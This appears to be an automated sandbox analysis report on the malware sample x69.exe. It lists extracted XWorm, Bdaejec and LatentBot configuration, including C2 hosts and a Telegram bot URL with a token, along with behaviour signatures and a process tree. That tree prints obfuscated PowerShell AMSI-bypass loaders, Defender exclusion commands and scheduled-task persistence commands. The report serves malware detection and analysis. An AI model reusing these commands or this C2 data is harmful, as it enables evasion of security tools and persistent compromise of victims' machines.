Resubmissions

22/05/2025, 12:12

250522-pc961stjt7 10

22/05/2025, 12:11

250522-pcnysatjt2 10

20/05/2025, 04:12

250520-eskwysbl9t 10

Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250502-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250502-enlocale:en-usos:windows10-2004-x64system
  • submitted
    20/05/2025, 04:12

General

  • Target

    x69.exe

  • Size

    285KB

  • MD5

    20841606ce69632f258221219aeee09b

  • SHA1

    b72918797186774598792c47b66d5857be59f576

  • SHA256

    1ca064f8c8eb72cd0cfda466bb582318c93d2856a89bcf323b37d820f05fdc83

  • SHA512

    aa1d6dcc49a66a5cef5fc64cae299c250bb5327d8d2e985db83e568b9d5acdde3b58249797f84fddcabf21210e194fa2ae3ca6b178286a3563d9574937e2b72e

  • SSDEEP

    6144:3RIUGV77XEc5EDEhp19jyVyFSXnIHq1h8tkEsjuIMN9lLk:uUG5oc5EDAU0F+18guI

Malware Config

Extracted

Family

xworm

Version

3.1

C2

grayhatgroupontop.zapto.org:1177

Attributes
  • Install_directory

    %AppData%

  • install_file

    USB.exe

  • telegram

    https://api.telegram.org/bot7717722960:AAGvuHVf2skcG3rQxo21EcgaQuXDN-eZ9zs/sendMessage?chat_id=6757433004

Extracted

Family

bdaejec

C2

ddos.dnsnb8.net

Extracted

Family

latentbot

C2

grayhatgroupontop.zapto.org

Signatures

  • Bdaejec

    Bdaejec is a backdoor written in C++.

  • Bdaejec family
  • Contains code to disable Windows Defender 1 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • Detect Xworm Payload 2 IoCs
  • Detects Bdaejec Backdoor. 5 IoCs

    Bdaejec is backdoor written in C++.

  • LatentBot

    Modular trojan written in Delphi which has been in-the-wild since 2013.

  • Latentbot family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 2 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 20 IoCs
  • Modifies security service 2 TTPs 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Command and Scripting Interpreter: PowerShell 1 TTPs 44 IoCs

    Using powershell.exe command.

  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • ASPack v2.12-2.42 1 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 7 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 11 IoCs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Modifies Security services 2 TTPs 8 IoCs

    Modifies the startup behavior of a security service.

  • Drops file in System32 directory 12 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 10 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 18 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of UnmapMainImage 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:616
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:316
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{56e19c1a-5867-4201-a1b5-6d367e23986d}
          2⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:6124
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{6c35e491-12b1-4996-a784-e152c28f1a1b}
          2⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2636
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
          PID:672
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
          1⤵
            PID:956
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
            1⤵
              PID:516
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
              1⤵
                PID:64
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                1⤵
                  PID:1040
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                  1⤵
                    PID:1052
                  • C:\Windows\System32\svchost.exe
                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                    1⤵
                      PID:1184
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                      1⤵
                      • Drops file in System32 directory
                      PID:1192
                      • C:\Windows\system32\taskhostw.exe
                        taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                        2⤵
                          PID:2544
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:gwjpPDXdjkay{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$EGyTRphnVKuFwK,[Parameter(Position=1)][Type]$SZhzBExtBK)$anWgFXQPnMo=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+'lec'+'t'+''+'e'+'d'+[Char](68)+''+'e'+''+'l'+''+'e'+''+[Char](103)+''+'a'+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+'Me'+'m'+''+'o'+'r'+'y'+''+[Char](77)+''+'o'+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+'e'+'',$False).DefineType('M'+[Char](121)+''+[Char](68)+''+[Char](101)+'le'+[Char](103)+'a'+'t'+''+'e'+''+[Char](84)+''+[Char](121)+'pe','C'+'l'+'ass,'+[Char](80)+''+'u'+''+[Char](98)+'l'+'i'+'c,'+[Char](83)+''+[Char](101)+''+[Char](97)+''+'l'+''+[Char](101)+''+'d'+''+','+'A'+'n'+''+'s'+'i'+'C'+''+[Char](108)+'a'+'s'+''+[Char](115)+''+[Char](44)+''+'A'+''+[Char](117)+''+[Char](116)+''+[Char](111)+''+'C'+''+[Char](108)+''+'a'+'s'+'s'+'',[MulticastDelegate]);$anWgFXQPnMo.DefineConstructor('R'+[Char](84)+''+'S'+'p'+[Char](101)+''+[Char](99)+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+[Char](78)+'a'+'m'+''+[Char](101)+''+[Char](44)+''+'H'+''+'i'+'d'+[Char](101)+''+[Char](66)+''+[Char](121)+'S'+'i'+'g'+[Char](44)+''+'P'+''+[Char](117)+''+'b'+'l'+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$EGyTRphnVKuFwK).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+[Char](116)+''+[Char](105)+'m'+[Char](101)+',M'+'a'+''+[Char](110)+''+[Char](97)+''+'g'+''+'e'+''+'d'+'');$anWgFXQPnMo.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+[Char](101)+'',''+'P'+'u'+[Char](98)+'li'+[Char](99)+''+[Char](44)+''+[Char](72)+''+'i'+''+'d'+'eB'+[Char](121)+'S'+[Char](105)+'g,'+'N'+''+'e'+''+[Char](119)+''+[Char](83)+''+'l'+''+'o'+''+'t'+''+[Char](44)+''+'V'+''+[Char](105)+'r'+'t'+''+[Char](117)+'a'+[Char](108)+'',$SZhzBExtBK,$EGyTRphnVKuFwK).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+''+[Char](116)+'i'+[Char](109)+''+'e'+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+'a'+[Char](103)+'ed');Write-Output $anWgFXQPnMo.CreateType();}$QVErDwZqdeeSw=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+'s'+''+'t'+''+'e'+''+[Char](109)+''+'.'+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType('M'+[Char](105)+''+'c'+'ro'+'s'+''+[Char](111)+''+[Char](102)+''+'t'+''+'.'+''+'W'+'i'+[Char](110)+'3'+'2'+''+[Char](46)+''+'U'+''+[Char](110)+'s'+[Char](97)+''+[Char](102)+''+[Char](101)+''+[Char](78)+'at'+[Char](105)+''+'v'+''+[Char](101)+'M'+[Char](101)+''+'t'+''+[Char](104)+''+'o'+''+[Char](100)+''+[Char](115)+'');$ASWRkXIrmAKEjJ=$QVErDwZqdeeSw.GetMethod('G'+'e'+''+[Char](116)+''+'P'+''+'r'+'o'+'c'+''+'A'+''+[Char](100)+''+[Char](100)+''+[Char](114)+''+[Char](101)+''+[Char](115)+'s',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+'i'+'c'+','+''+'S'+''+'t'+''+[Char](97)+'t'+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$lkbVUXvgrIsctGOmmOe=gwjpPDXdjkay @([String])([IntPtr]);$mAfbTdbxxfDadunDNGCeia=gwjpPDXdjkay @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$fEOFZTTGPJH=$QVErDwZqdeeSw.GetMethod(''+[Char](71)+''+[Char](101)+'tM'+[Char](111)+''+[Char](100)+''+'u'+''+'l'+'e'+[Char](72)+''+[Char](97)+''+[Char](110)+''+'d'+''+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+'e'+'r'+''+[Char](110)+''+[Char](101)+''+'l'+''+[Char](51)+''+'2'+'.'+[Char](100)+'ll')));$ReZDSaRdXaeEhN=$ASWRkXIrmAKEjJ.Invoke($Null,@([Object]$fEOFZTTGPJH,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+[Char](100)+''+[Char](76)+''+[Char](105)+'br'+[Char](97)+''+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$EOeVtdgxRABKatLMa=$ASWRkXIrmAKEjJ.Invoke($Null,@([Object]$fEOFZTTGPJH,[Object](''+[Char](86)+'i'+[Char](114)+'t'+'u'+'alPr'+'o'+'t'+[Char](101)+''+[Char](99)+''+'t'+'')));$nMDYmQs=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ReZDSaRdXaeEhN,$lkbVUXvgrIsctGOmmOe).Invoke('a'+[Char](109)+''+[Char](115)+'i'+[Char](46)+''+'d'+''+[Char](108)+''+[Char](108)+'');$fzaAOoamoSPhzDgTe=$ASWRkXIrmAKEjJ.Invoke($Null,@([Object]$nMDYmQs,[Object](''+[Char](65)+''+[Char](109)+''+'s'+''+'i'+''+'S'+''+'c'+''+'a'+''+'n'+''+[Char](66)+'u'+'f'+'f'+[Char](101)+''+[Char](114)+'')));$Ivpcqfqpxz=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($EOeVtdgxRABKatLMa,$mAfbTdbxxfDadunDNGCeia).Invoke($fzaAOoamoSPhzDgTe,[uint32]8,4,[ref]$Ivpcqfqpxz);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$fzaAOoamoSPhzDgTe,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($EOeVtdgxRABKatLMa,$mAfbTdbxxfDadunDNGCeia).Invoke($fzaAOoamoSPhzDgTe,[uint32]8,0x20,[ref]$Ivpcqfqpxz);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+[Char](70)+''+[Char](84)+'WA'+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](120)+''+'6'+''+[Char](57)+''+[Char](115)+'tag'+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
                          2⤵
                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                          • Command and Scripting Interpreter: PowerShell
                          • Drops file in System32 directory
                          • Suspicious use of SetThreadContext
                          • Modifies data under HKEY_USERS
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4348
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:wndeDcOuxJyW{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$cqOPlRudTeSnnN,[Parameter(Position=1)][Type]$aBdREcctId)$KLyzITCmmIs=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+[Char](102)+''+[Char](108)+''+[Char](101)+''+'c'+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+[Char](68)+''+'e'+'le'+[Char](103)+''+[Char](97)+'t'+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'Me'+[Char](109)+''+[Char](111)+''+[Char](114)+''+[Char](121)+''+[Char](77)+''+[Char](111)+''+[Char](100)+'u'+'l'+'e',$False).DefineType(''+'M'+'y'+'D'+'el'+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+'T'+''+[Char](121)+''+[Char](112)+'e','C'+[Char](108)+''+'a'+''+'s'+''+'s'+''+','+''+[Char](80)+'u'+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](101)+''+'a'+'l'+[Char](101)+''+[Char](100)+''+','+''+[Char](65)+'n'+[Char](115)+'i'+[Char](67)+''+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+''+','+''+'A'+'u'+[Char](116)+'o'+[Char](67)+''+'l'+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$KLyzITCmmIs.DefineConstructor(''+[Char](82)+'T'+[Char](83)+''+[Char](112)+'e'+[Char](99)+''+[Char](105)+'a'+[Char](108)+'N'+'a'+''+[Char](109)+'e'+[Char](44)+'H'+[Char](105)+''+[Char](100)+'e'+'B'+'y'+'S'+'i'+'g'+''+[Char](44)+''+[Char](80)+''+'u'+''+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$cqOPlRudTeSnnN).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+'M'+''+'a'+''+'n'+''+[Char](97)+''+[Char](103)+''+'e'+'d');$KLyzITCmmIs.DefineMethod(''+[Char](73)+'n'+'v'+''+[Char](111)+''+[Char](107)+''+'e'+'',''+'P'+''+[Char](117)+''+[Char](98)+'l'+[Char](105)+''+[Char](99)+''+','+''+'H'+''+[Char](105)+''+'d'+''+[Char](101)+''+[Char](66)+''+'y'+''+[Char](83)+''+'i'+''+[Char](103)+''+','+''+[Char](78)+'e'+'w'+''+[Char](83)+''+'l'+''+[Char](111)+'t,'+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+'',$aBdREcctId,$cqOPlRudTeSnnN).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+'t'+''+'i'+'m'+[Char](101)+''+[Char](44)+''+[Char](77)+'a'+[Char](110)+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $KLyzITCmmIs.CreateType();}$GAEdqfBeOtXRU=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+[Char](115)+'t'+[Char](101)+''+[Char](109)+''+'.'+'d'+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+''+'c'+'rosoft'+'.'+''+'W'+''+[Char](105)+'n3'+'2'+''+[Char](46)+'U'+'n'+''+'s'+'a'+[Char](102)+''+[Char](101)+''+'N'+''+'a'+''+[Char](116)+'iv'+[Char](101)+''+[Char](77)+''+[Char](101)+''+[Char](116)+''+[Char](104)+''+[Char](111)+''+[Char](100)+''+[Char](115)+'');$jFokKXmvUCMqXx=$GAEdqfBeOtXRU.GetMethod(''+'G'+''+'e'+'t'+[Char](80)+''+[Char](114)+'oc'+'A'+''+'d'+''+[Char](100)+'r'+[Char](101)+''+[Char](115)+''+'s'+'',[Reflection.BindingFlags](''+'P'+''+[Char](117)+'b'+'l'+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](116)+''+'a'+''+[Char](116)+''+'i'+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$BeVuaQsZPkIBjfUtdcw=wndeDcOuxJyW @([String])([IntPtr]);$hSBXIQwXtoyHXUDcycnAeO=wndeDcOuxJyW @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$MOqpBmKFIuF=$GAEdqfBeOtXRU.GetMethod(''+'G'+''+[Char](101)+''+'t'+''+'M'+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+'l'+''+[Char](101)+'H'+[Char](97)+''+[Char](110)+''+[Char](100)+''+[Char](108)+''+'e'+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+''+[Char](110)+''+'e'+''+'l'+'3'+[Char](50)+''+'.'+'d'+'l'+'l')));$lOXpkLenleHsgM=$jFokKXmvUCMqXx.Invoke($Null,@([Object]$MOqpBmKFIuF,[Object]('L'+[Char](111)+''+[Char](97)+''+'d'+''+'L'+''+[Char](105)+''+[Char](98)+''+[Char](114)+''+'a'+''+[Char](114)+'y'+[Char](65)+'')));$BNkFFxcqxhXuJFhoN=$jFokKXmvUCMqXx.Invoke($Null,@([Object]$MOqpBmKFIuF,[Object](''+'V'+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+'l'+[Char](80)+''+[Char](114)+'o'+[Char](116)+'e'+[Char](99)+''+'t'+'')));$cLbnIeA=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($lOXpkLenleHsgM,$BeVuaQsZPkIBjfUtdcw).Invoke('a'+[Char](109)+''+[Char](115)+''+[Char](105)+'.'+[Char](100)+'l'+[Char](108)+'');$wCVQpXLlZspVveqCi=$jFokKXmvUCMqXx.Invoke($Null,@([Object]$cLbnIeA,[Object](''+[Char](65)+''+[Char](109)+'s'+[Char](105)+''+[Char](83)+''+[Char](99)+''+'a'+''+[Char](110)+''+'B'+''+[Char](117)+''+[Char](102)+''+[Char](102)+''+[Char](101)+''+[Char](114)+'')));$xDvWZkIXPW=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($BNkFFxcqxhXuJFhoN,$hSBXIQwXtoyHXUDcycnAeO).Invoke($wCVQpXLlZspVveqCi,[uint32]8,4,[ref]$xDvWZkIXPW);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$wCVQpXLlZspVveqCi,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($BNkFFxcqxhXuJFhoN,$hSBXIQwXtoyHXUDcycnAeO).Invoke($wCVQpXLlZspVveqCi,[uint32]8,0x20,[ref]$xDvWZkIXPW);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+'O'+'F'+[Char](84)+''+[Char](87)+'A'+[Char](82)+''+'E'+'').GetValue(''+[Char](120)+''+'6'+''+[Char](57)+''+'s'+''+[Char](116)+''+[Char](97)+''+[Char](103)+''+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
                          2⤵
                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                          • Command and Scripting Interpreter: PowerShell
                          • Drops file in System32 directory
                          • Suspicious use of SetThreadContext
                          • Modifies data under HKEY_USERS
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4192
                        • C:\Users\Admin\AppData\Roaming\x69.exe
                          C:\Users\Admin\AppData\Roaming\x69.exe
                          2⤵
                          • Executes dropped EXE
                          PID:6132
                        • C:\Users\Admin\AppData\Roaming\x69.exe
                          C:\Users\Admin\AppData\Roaming\x69.exe
                          2⤵
                          • Executes dropped EXE
                          PID:2132
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                        1⤵
                          PID:1288
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                          1⤵
                            PID:1324
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                            1⤵
                              PID:1396
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                              1⤵
                                PID:1456
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                1⤵
                                  PID:1476
                                  • C:\Windows\system32\sihost.exe
                                    sihost.exe
                                    2⤵
                                      PID:2912
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                    1⤵
                                      PID:1508
                                    • C:\Windows\System32\svchost.exe
                                      C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                      1⤵
                                        PID:1524
                                      • C:\Windows\system32\svchost.exe
                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                        1⤵
                                          PID:1652
                                        • C:\Windows\System32\svchost.exe
                                          C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                          1⤵
                                            PID:1688
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                            1⤵
                                              PID:1744
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                              1⤵
                                                PID:1784
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                1⤵
                                                  PID:1832
                                                • C:\Windows\system32\svchost.exe
                                                  C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                  1⤵
                                                    PID:1948
                                                  • C:\Windows\System32\svchost.exe
                                                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                    1⤵
                                                      PID:1956
                                                    • C:\Windows\system32\svchost.exe
                                                      C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                      1⤵
                                                        PID:2004
                                                      • C:\Windows\System32\svchost.exe
                                                        C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                        1⤵
                                                          PID:2044
                                                        • C:\Windows\System32\spoolsv.exe
                                                          C:\Windows\System32\spoolsv.exe
                                                          1⤵
                                                            PID:2064
                                                          • C:\Windows\System32\svchost.exe
                                                            C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                            1⤵
                                                              PID:2144
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                              1⤵
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:2172
                                                            • C:\Windows\System32\svchost.exe
                                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                              1⤵
                                                                PID:2316
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                1⤵
                                                                  PID:2428
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                  1⤵
                                                                    PID:2436
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                    1⤵
                                                                    • Drops file in System32 directory
                                                                    PID:2664
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                    1⤵
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:2704
                                                                  • C:\Windows\sysmon.exe
                                                                    C:\Windows\sysmon.exe
                                                                    1⤵
                                                                      PID:2728
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                      1⤵
                                                                        PID:2752
                                                                      • C:\Windows\System32\svchost.exe
                                                                        C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                        1⤵
                                                                          PID:2768
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                          1⤵
                                                                            PID:2944
                                                                          • C:\Windows\system32\wbem\unsecapp.exe
                                                                            C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                            1⤵
                                                                              PID:3032
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                              1⤵
                                                                                PID:3140
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                1⤵
                                                                                  PID:3404
                                                                                • C:\Windows\Explorer.EXE
                                                                                  C:\Windows\Explorer.EXE
                                                                                  1⤵
                                                                                  • Suspicious behavior: GetForegroundWindowSpam
                                                                                  • Suspicious use of UnmapMainImage
                                                                                  PID:3528
                                                                                  • C:\Users\Admin\AppData\Local\Temp\x69.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\x69.exe"
                                                                                    2⤵
                                                                                    • Checks computer location settings
                                                                                    • Adds Run key to start application
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    • Suspicious use of WriteProcessMemory
                                                                                    PID:2884
                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\x69.exe'
                                                                                      3⤵
                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:856
                                                                                    • C:\Windows\System32\schtasks.exe
                                                                                      "C:\Windows\System32\schtasks.exe" /Create /F /TN "x69" /SC ONLOGON /TR "C:\Users\Admin\AppData\Roaming\x69.exe" /RL HIGHEST
                                                                                      3⤵
                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                      PID:3416
                                                                                    • C:\Users\Admin\AppData\Roaming\x69.exe
                                                                                      "C:\Users\Admin\AppData\Roaming\x69.exe"
                                                                                      3⤵
                                                                                      • Executes dropped EXE
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:864
                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe'
                                                                                      3⤵
                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:2260
                                                                                    • C:\Windows\System32\schtasks.exe
                                                                                      "C:\Windows\System32\schtasks.exe" /Create /F /TN "x69Disable-winDefender" /SC ONLOGON /TR "C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe" /RL HIGHEST
                                                                                      3⤵
                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                      PID:928
                                                                                    • C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe
                                                                                      "C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe"
                                                                                      3⤵
                                                                                      • Checks computer location settings
                                                                                      • Executes dropped EXE
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      • Suspicious use of WriteProcessMemory
                                                                                      PID:1848
